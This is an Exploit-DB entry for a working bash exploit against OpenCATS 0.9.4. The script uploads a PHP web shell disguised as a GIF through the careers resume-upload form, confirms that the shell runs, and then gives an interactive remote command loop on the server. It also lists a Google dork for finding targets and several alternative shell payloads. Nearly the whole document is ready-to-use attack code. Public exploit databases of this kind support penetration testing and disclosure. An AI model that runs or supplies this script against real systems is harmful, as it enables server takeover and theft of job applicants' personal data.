OpenCATS 0.9.4 - Remote Code Execution (RCE)

EDB-ID:

50585

CVE:

N/A

EDB Verified:

Author:

Nicholas Ferreira

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2021-12-10

Vulnerable App: 
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server

#!/bin/bash

if [ $# -eq 0 ]
then
	echo "Usage: $0 <target URL>"
	exit
fi



# if a payload doesn't work, try another

payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'

target=$1

green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"

#====================== Functions

rev() {
while true
	do echo -n -e "\n$ "
	read cmd
	curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
	done
}

upload() {
	curl -skL $1/$2 \
	-H "Connection: close" \
	-F resumeFile=@"$3;type=application/x-php" \
	-F ID="$firstJb" \
	-F candidateID="-1" \
	-F applyToJobSubAction="resumeLoad" \
	--compressed \
	--insecure
}

getVersion() {
	ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`

	if [ -z "${ver}" ]
	then
		ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
		if [ -z "${ver}" ]
		then
			echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
			return 0
		fi
	fi
	echo -e "${green}[*] Version detected: $ver${reset}"
}

writePayload(){

	tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
	file=`basename $tmpfile`
	echo "$1" > $tmpfile
}

banner(){
	echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
	echo -e "\n"
}

#======================

banner

echo "[*] Attacking target $target"

echo "[*] Checking CATS version..."
getVersion $target
#exit

echo "[*] Creating temp file with payload..."
writePayload "$payload"

#exit

echo "[*] Checking active jobs..."

jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`
firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

if [[ ! $numJb -gt 0 ]]
then
	echo -e "${red}[-] No active jobs found.${reset}"
	echo "[*] Trying another path..."
	jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
	numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`

	if [[ ! $numJb -gt 0 ]]
	then
		echo -e "${red}[-] Couldn't find any active job.${reset}"
		exit
	fi
fi

firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`

echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"
echo "[*] Sending payload..."

req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
	echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
	echo "[*] Checking by another method..."

	sed -i "s/GIF87a//" $tmpfile

	req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`

	if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
	then
		echo -e "${red}[-] Couldn't upload payload...${reset}"
		exit
	fi
fi

echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
rm $tmpfile
echo "[*] Checking shell..."
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if `echo $check | grep -q "0x7359"`
then
	echo -e "${green}[+] Got shell! :D${reset}"
	curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
	rev $target/upload/careerportaladd/$file
else
	echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services